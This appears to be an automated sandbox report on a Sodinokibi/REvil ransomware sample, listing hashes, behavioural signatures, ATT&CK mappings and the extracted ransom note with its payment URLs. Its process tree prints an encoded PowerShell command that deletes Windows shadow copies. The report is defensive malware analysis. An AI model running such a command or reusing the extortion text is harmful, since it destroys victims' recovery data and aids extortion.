Overview

overview

10

Static

static

10

82b871a1ab...20.exe

windows7_x64

10

82b871a1ab...20.exe

windows10_x64

10

Analysis

  • max time kernel
    149s
  • max time network
    174s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    24-01-2022 01:42

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    82b871a1ab31d0cd7d276e776f459d9b23f256d73b7ada0aada083ab88db0e20.exe

  • Size

    165KB

  • MD5

    af54e287c3671ad0f97e0f42cfcb62b3

  • SHA1

    3c337eee2f02293037a872d4aace36cf5ae00d4f

  • SHA256

    82b871a1ab31d0cd7d276e776f459d9b23f256d73b7ada0aada083ab88db0e20

  • SHA512

    8bd5fd000633ab963ce8b76f10f1aa4eaf1b1136c18a2c4a36454acc37fd2f37ef45c569fe852fb43a1d506308e26b102f90c2528a0c27399c7f2ee1f9e363da

Score
10/10
sodinokibipersistenceransomware

Malware Config

Extracted

Path

C:\How to decrypt d0n36g91-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your computer has extension d0n36g91. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B6EF5118E001D33A 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/B6EF5118E001D33A Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: YYa+7/uP+bhfjrR5l5eh3N0RU3ExbpAQck/2KJD5QJwdS6FStuxNyItwPRwGJvvd opK33zWM7M9orKsdVOwusfyzJ8pms9QpV2ZWJP41CuQNg0ifdpK0hqpyFrVLIPkL nRKOfgx94Yf3I2lw2mEF/ySijOB4ht0/IFq4P14WC1NWXQINh+tujdyN+lZwbzrv GkQqMWK+ZGRSDOEfV1YTZGZWwZ6GgDGXdema/0eyVK0GneV5JQ1dwNjBH70gV6fQ hocsMFOucqRknyM/D3hqm9h4VDGCQyczjWOoyJSLN0QV2NHGE+EnfANFMUalmxcc CJl3iQc1i1+CUwl8i8mVo+8QhqCAAqSjKYl/jx92KOZdSAy7/I68n8/aqwqvlbDJ X0IjfUV7orprp5uZrFAC6OvIewyUwfJ6DzZ+oPBtGcmbakiRisrf+F38SKTkc9jK cijvACikaTsICQ73HjorUpkKpfwudKB5bESsSY+SLUpLhxuQDJHEbmU6Obu+iDg9 8ywzjYoJ63a2G1LjdJKgzVq0+/LJG0DwTlUEKodgQ+Xs2sp+ywoDRTpdiHO0HZ/0 F4q8A4xiZ2fBiSQ4Vl5/4KvqabncFEmAZHV3qzQ1ufGz3g5t5Ej8OcjOLWhTUILA S7wJ6oy9Nam5+j6sznR7KGu6GbZ9RVvj6ipEorYpExKdLdj01b8IZa6bBdjphuYW 1AH9vFnj6Z0EyjeLYC5MWS47hkG2i7K4PdnpTJVUmS2vpaHOtYUS12NDb4dEq+nz biGBUTYk11p6yTP9eqOUyvG02KcvTc1SFbf+AP6/jZGt2wZVMgioPwF8MKl8HSIZ IlobXL0T/34swRsb2GoHT8pTgxvS2uhN5Anajrm3YqQMX+OReq9vwk9GpV/ivJ8n wF5Py9xBR7JD+eH6KNAYzi4EsQGdTuu3PJeIoLZ2IKEPvjTVmUqWR8a3cfm4WH/n KUGrlvCchwQxGEHRLKlLNXFMrjBqc85+CBqGMIbJM6dkyFBRW1JRANfhkAes2Px+ ynWU/IzMO6fu/7IRSCCBHAkkgPeafxppfq+KG7ugPeue2FJnEflwBhHJiE0NTUzS X8wZ0yDHGynTlSDKl92AGCkuaXhsCvsPGfoWxgCCXftL6mgZKEsIe2RrYkQ5yqjO d4n2UWP2vp4= Extension name: d0n36g91 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B6EF5118E001D33A

http://decryptor.top/B6EF5118E001D33A

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Modifies extensions of user files 14 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 38 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\82b871a1ab31d0cd7d276e776f459d9b23f256d73b7ada0aada083ab88db0e20.exe
    "C:\Users\Admin\AppData\Local\Temp\82b871a1ab31d0cd7d276e776f459d9b23f256d73b7ada0aada083ab88db0e20.exe"
    1⤵
    • Modifies extensions of user files
    • Adds Run key to start application
    • Enumerates connected drives
    • Drops file in System32 directory
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1732
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:804
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:380
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:976

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Persistence

    Registry Run Keys / Startup Folder

    1
    T1060

    Privilege Escalation

    Defense Evasion

    Modify Registry

    3
    T1112

    Install Root Certificate

    1
    T1130

    Credential Access

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    1
    T1082

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Defacement

    1
    T1491

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/804-56-0x000007FEFB801000-0x000007FEFB803000-memory.dmp
      Filesize

      8KB

      Download
    • memory/804-57-0x000007FEF28E0000-0x000007FEF343D000-memory.dmp
      Filesize

      11.4MB

      Download
    • memory/804-58-0x0000000002780000-0x0000000002782000-memory.dmp
      Filesize

      8KB

      Download
    • memory/804-59-0x0000000002782000-0x0000000002784000-memory.dmp
      Filesize

      8KB

      Download
    • memory/804-60-0x0000000002784000-0x0000000002787000-memory.dmp
      Filesize

      12KB

      Download
    • memory/804-61-0x000000000278B000-0x00000000027AA000-memory.dmp
      Filesize

      124KB

      Download
    • memory/1732-55-0x0000000074F11000-0x0000000074F13000-memory.dmp
      Filesize

      8KB

      Download